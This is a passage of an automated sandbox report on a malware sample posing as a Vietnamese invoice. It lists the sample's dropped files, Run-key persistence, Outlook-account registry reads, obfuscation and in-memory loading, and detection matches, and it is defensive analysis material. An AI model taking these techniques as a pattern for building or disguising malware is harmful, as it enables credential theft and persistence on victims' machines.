Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3920:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-E9KXT7

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Yara detected Costura Assembly Loader

Source: Yara match	File source: 28.2.Shhejayly.exe.36c99b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.381f0c0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.7610000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.7610000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.7bd0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.381f0c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.7bd0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.543466399.0000000003093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.542998195.0000000002653000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.365213489.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.355179401.0000000002596000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.600053448.0000000007BD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.551264239.000000000370A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271856566.0000000003772000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dwn.exe PID: 2088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Shhejayly.exe PID: 4420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Shhejayly.exe PID: 5608, type: MEMORYSTR

.NET source code contains potential unpacker

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, Form1.cs	.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: Shhejayly.exe.0.dr, Form1.cs	.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.180000.0.unpack, Form1.cs	.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: Cuhcxlcg[1].exe.12.dr, Form1.cs	.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: dwn.exe.12.dr, Form1.cs	.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.dwn.exe.ae0000.0.unpack, Form1.cs	.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E357F push esi; retf	0_2_077E3582
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E3DAE push ds; ret	0_2_077E3DBA
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077EAC8A push E8000001h; retf	0_2_077EAC91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_10002806 push ecx; ret	12_2_10002819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E002 push edx; retf	14_2_0044E07A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E002 push edx; retf	14_2_0044E0BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E0C8 push edx; retf	14_2_0044E0CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E0B4 push edx; retf	14_2_0044E0BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E0B0 push eax; retf	14_2_0044E0B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E144 push ebp; iretd	14_2_0044E146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E148 push esp; iretd	14_2_0044E152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E17C push ecx; retf	14_2_0044E142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E130 push edi; retf	14_2_0044E136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E138 push ecx; retf	14_2_0044E142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E1C4 push eax; retf	14_2_0044E1C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044693D push ecx; ret	14_2_0044694D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044DB70 push eax; ret	14_2_0044DB84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044DB70 push eax; ret	14_2_0044DBAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00451D54 push eax; ret	14_2_00451D61

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

14_2_004044A4

Binary contains a suspicious time stamp

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Static PE information: 0xB7B87B95 [Sun Sep 4 00:13:09 2067 UTC]

Creates processes with suspicious names

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	File created: \y#u00eau c#u1ea7u b#u00e1o gi#u00e1 inv20230104-vn.exe
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	File created: \y#u00eau c#u1ea7u b#u00e1o gi#u00e1 inv20230104-vn.exe
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	File created: \y#u00eau c#u1ea7u b#u00e1o gi#u00e1 inv20230104-vn.exe	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	File created: \y#u00eau c#u1ea7u b#u00e1o gi#u00e1 inv20230104-vn.exe	Jump to behavior

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Cuhcxlcg[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File created: C:\Users\user\AppData\Local\Temp\dwn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	File created: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Jump to dropped file

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Shhejayly			Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Shhejayly			Jump to behavior

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
